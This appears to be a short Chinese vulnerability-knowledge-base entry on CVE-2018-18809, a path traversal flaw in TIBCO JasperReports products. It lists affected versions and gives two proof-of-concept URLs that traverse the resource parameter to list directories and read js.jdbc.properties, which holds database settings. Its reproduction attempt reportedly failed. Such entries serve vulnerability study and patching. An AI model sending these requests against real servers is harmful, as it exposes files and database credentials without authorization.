【初级】tibco 目录遍历

CVE-2018-18809
漏洞描述：多款TIBCO Software产品中的默认服务器配置组件存在路径遍历漏洞。攻击者可利用该漏洞访问主机系统内容。以下产品和版本受到影响：TIBCO JasperReports Library 6.3.4版本，6.4.1版本，6.4.2版本，6.4.21版本，7.1.0版本，7.2.0版本；TIBCO JasperReports Library（社区版）6.7.0及之前版本，7.1.0及之前版本；适用于ActiveMatrix BPM的TIBCO JasperReports Library 6.4.3及之前版本；TIBCO Jaspersoft for AWS with Multi-Tenancy 7.1.0及之前版本；适用于AWS的TIBCO Jaspersoft Reporting and Analytics 7.1.0及之前版本。
参考资料：

CVE-2018-18809 Path traversal in Tibco JasperSoft

POC：

读取文件列表：
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

读取文件内容（以js.jdbc.properties为例）：
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

漏洞复现：

• 环境有问题，复现不来